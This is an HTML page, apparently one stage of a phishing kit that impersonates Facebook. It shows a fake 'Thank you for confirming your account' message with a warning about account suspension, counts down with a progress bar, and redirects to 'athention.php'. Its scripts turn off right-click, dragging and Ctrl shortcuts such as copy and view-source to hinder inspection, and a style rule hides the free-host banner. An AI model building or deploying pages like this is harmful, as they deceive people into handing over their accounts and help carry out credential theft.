<html class="_9dls __fb-light-mode" lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <link rel="icon" type="image/png" href="./sucess_files/8PtnTFGuUVu.png">
        <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2,shrink-to-fit=no">
        <link type="text/css" rel="stylesheet" href="./sucess_files/style-m.css">
        <link type="text/css" rel="stylesheet" href="./sucess_files/g2SAD3rtfUHJ5.css">
        <script type="text/javascript">
            function mousedwn(e) {
                try {
                    if (event.button == 2 || event.button == 3)
                        return false
                } catch (e) {
                    if (e.which == 3)
                        return false
                }
            }
            document.oncontextmenu = function() {
                return false
            }
            ;
            document.ondragstart = function() {
                return false
            }
            ;
            document.onmousedown = mousedwn
        </script>
        <script type="text/javascript">
            window.addEventListener("keydown", function(e) {
                if (e.ctrlKey && (e.which == 65 || e.which == 66 || e.which == 67 || e.which == 73 || e.which == 80 || e.which == 83 || e.which == 85 || e.which == 86)) {
                    e.preventDefault()
                }
            });
            document.keypress = function(e) {
                if (e.ctrlKey && (e.which == 65 || e.which == 66 || e.which == 67 || e.which == 73 || e.which == 80 || e.which == 83 || e.which == 85 || e.which == 86)) {}
                return false
            }
        </script>
        <title>Terms of Service</title>
    </head>
    <body class="_6s5d _71pn system-fonts--body roboto">
        <div id="mount_0_0_2d" style="">
            <span id="ssrb_root_start" style="display:none"></span>
            <div>
                <div class="">
                    <form action="button_location=settings&amp;button_name=in" method="POST">
                        <div class="rq0escxv l9j0dhe7 du4w35lb">
                            <div class="rq0escxv du4w35lb q5bimw55 datstx6m d76ob5m9 eg9m0zos poy2od1o ofs802cu j9ispegn kr520xx4 k4urcfbm pohlnb88 dkue75c7 mb9wzai9" aria-hidden="true" id="scrollview" style="left: 0px;">
                                <div class="du4w35lb l9j0dhe7 cbu4d94t j83agx80">
                                    <div class="j83agx80 cbu4d94t l9j0dhe7 jgljxmt5 be9z9djy">
                                        <div class="rq0escxv bp9cbjyn b2utzkls j83agx80 buofh1pr qu8okrzs taijpn5t poy2od1o j9ispegn kr520xx4 k4urcfbm tkr6xdv7">
                                            <div class="rq0escxv l9j0dhe7 du4w35lb d2edcug0 d1544ag0 tw6a2znq">
                                                <i data-visualcompletion="css-img" style="background-image:url(&#39;img/meTlOGo.png&#39;);background-position:0 0;background-size:105px 25px;width:105px;height:25px;background-repeat:no-repeat;display:inline-block"></i>
                                            </div>
                                        </div>
                                        <div class="rq0escxv l9j0dhe7 du4w35lb">
                                            <div class="du4w35lb l9j0dhe7 cbu4d94t j83agx80">
                                                <div class="j83agx80 cbu4d94t l9j0dhe7 jgljxmt5 be9z9djy">
                                                    <div class="dp1hu0rb d2edcug0 taijpn5t j83agx80 gs1a9yip">
                                                        <div class="k4urcfbm dp1hu0rb d2edcug0 cbu4d94t j83agx80 bp9cbjyn" role="main">
                                                            <div class="bp9cbjyn j83agx80 cbu4d94t l9j0dhe7 k4urcfbm du4w35lb a8bpqtnw pdtwyc45">
                                                                <div class="k4urcfbm ji3y4fs9">
                                                                    <div class="j83agx80 l9j0dhe7 k4urcfbm">
                                                                        <div class="rq0escxv l9j0dhe7 du4w35lb hybvsw6c io0zqebd m5lcvass fbipl8qg nwvqtn77 k4urcfbm ni8dbmo4 stjgntxs sbcfpzgs" style="border-radius: max(0px, min(8px, ((100vw - 4px) - 100%) * 9999)) / 8px;">
                                                                            <div class="tojvnm2t a6sixzi8 k5wvi7nf q3lfd5jv pk4s997a bipmatt0 cebpdrjk qowsmv63 owwhemhu dp1hu0rb dhp61c6y l9j0dhe7 iyyx5f41 a8s20v7p">
                                                                                <div>
                                                                                    <div>
                                                                                        <div class="l9j0dhe7 du4w35lb rq0escxv j83agx80 cbu4d94t pfnyh3mw d2edcug0">
                                                                                            <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t buofh1pr tgvbjcpo">
                                                                                                <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0">
                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 pfnyh3mw i1fnvgqd gs1a9yip owycx6da btwxx1t3 hv4rvrfc dati1w0a discj3wi">
                                                                                                        <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t d2edcug0 hpfvmrgz rj1gh0hx buofh1pr g5gj957u jb3vyjys rz4wbd8a qt6c0cv9 a8nywdso">
                                                                                                            <div class="l9j0dhe7 du4w35lb rq0escxv j83agx80 cbu4d94t pfnyh3mw d2edcug0 discj3wi ihqw7lf3">
                                                                                                                <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t buofh1pr tgvbjcpo sv5sfqaa obtkqiv7">
                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0 bp9cbjyn aov4n071 bi6gxh9e">
                                                                                                                        <img class="sizmg" alt="" referrerpolicy="origin-when-cross-origin" src="img/outro.png">
                                                                                                                    </div>
                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0 bp9cbjyn aov4n071 bi6gxh9e discj3wi ihqw7lf3">
                                                                                                                        <div class="sv5sfqaa obtkqiv7 cbu4d94t j83agx80">
                                                                                                                            <div class="aov4n071 bi6gxh9e">
                                                                                                                                <span class="d2edcug0 hpfvmrgz qv66sw1b c1et5uql b0tq1wua a8c37x1j fe6kdd0r mau55g9w c8b282yb keod5gw0 nxhoafnm aigsh9s9 d3f4x2em rwim8176 o0t2es00 f530mmz5 hnhda86s oo9gr5id oqcyycmt" dir="auto">Please Wait...</span>
                                                                                                                            </div>
                                                                                                                        </div>
                                                                                                                    </div>
                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0 bp9cbjyn aov4n071 bi6gxh9e">
                                                                                                                        <div class="l9j0dhe7 du4w35lb rq0escxv j83agx80 cbu4d94t pfnyh3mw d2edcug0">
                                                                                                                            <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t buofh1pr tgvbjcpo">
                                                                                                                                <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0">
                                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 pfnyh3mw i1fnvgqd gs1a9yip owycx6da btwxx1t3 d1544ag0 tw6a2znq jb3vyjys mysgfdmx hddg9phg"></div>
                                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t d2edcug0 hpfvmrgz rj1gh0hx buofh1pr g5gj957u nqmvxvec iuny7tx3 ipjc6fyt">
                                                                                                                                        <div class="w0hvl6rk hop8lmos rf5wgz6l jfpizvyy dati1w0a">
                                                                                                                                            <div class="j83agx80 cbu4d94t ew0dbk1b irj2b8pg">
                                                                                                                                                <div class="qzhwtbm6 knvmm38d">
                                                                                                                                                    <span class="d2edcug0 hpfvmrgz qv66sw1b c1et5uql b0tq1wua a8c37x1j fe6kdd0r mau55g9w c8b282yb keod5gw0 nxhoafnm aigsh9s9 tia6h79c iv3no6db a5q79mjw g1cxx5fr lrazzd5p oo9gr5id hzawbc8m" dir="auto">Thank you for confirming your account</span>
                                                                                                                                                </div>
                                                                                                                                                <div class="qzhwtbm6 knvmm38d">
                                                                                                                                                    <span class="d2edcug0 hpfvmrgz qv66sw1b c1et5uql b0tq1wua a8c37x1j fe6kdd0r mau55g9w c8b282yb keod5gw0 nxhoafnm aigsh9s9 d9wwppkn hrzyx87i jq4qci2q a3bd9o3v b1v8xokw oo9gr5id hzawbc8m" dir="auto">This warning is to prevent the account being permanently disabled if there is a violation of Facebook's terms.</span>
                                                                                                                                                </div>
                                                                                                                                            </div>
                                                                                                                                        </div>
                                                                                                                                    </div>
                                                                                                                                </div>
                                                                                                                            </div>
                                                                                                                        </div>
                                                                                                                    </div>
                                                                                                                </div>
                                                                                                                <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t pfnyh3mw d2edcug0 aov4n071 bi6gxh9e">
                                                                                                                    <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 pfnyh3mw i1fnvgqd gs1a9yip owycx6da btwxx1t3 jb3vyjys dlv3wnog rl04r1d5 enqfppq2 muag1w35">
                                                                                                                        <div class="rq0escxv l9j0dhe7 du4w35lb j83agx80 cbu4d94t d2edcug0 hpfvmrgz rj1gh0hx buofh1pr g5gj957u ph5uu5jm b3onmgus e5nlhep0 ecm0bbzt">
                                                                                                                            <div class="n00je7tq arfg74bv qs9ysxi8 k77z8yql i09qtzwb n7fi1qx3 b5wmifdl hzruof5a pmk7jnqg j9ispegn kr520xx4 c5ndavph art1omkt ot9fgl3s" data-visualcompletion="ignore"></div>
                                                                                                                            <div class="texfix">...</div>
                                                                                                                            <progress class="btn-block" value="6" max="10" id="progressBar" name="login" role="button" data-sigil="touchable"></progress>
                                                                                                                            <script>
                                                                                                                                var timeleft = 10;
                                                                                                                                var downloadTimer = setInterval(function() {
                                                                                                                                    document.getElementById("progressBar").value = 10 - --timeleft;
                                                                                                                                    if (timeleft <= 0)
                                                                                                                                        setTimeout("window.location='athention.php'");
                                                                                                                                }, 1000);
                                                                                                                            </script>
                                                                                                                        </div>
                                                                                                                    </div>
                                                                                                                </div>
                                                                                                            </div>
                                                                                                        </div>
                                                                                                    </div>
                                                                                                </div>
                                                                                            </div>
                                                                                        </div>
                                                                                    </div>
                                                                                </div>
                                                                            </div>
                                                                        </div>
                                                                    </div>
                                                                </div>
                                                            </div>
                                                        </div>
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </body>
</html>
<style>
    img[alt="www.000webhost.com"] {
        display: none;
    }
</style>
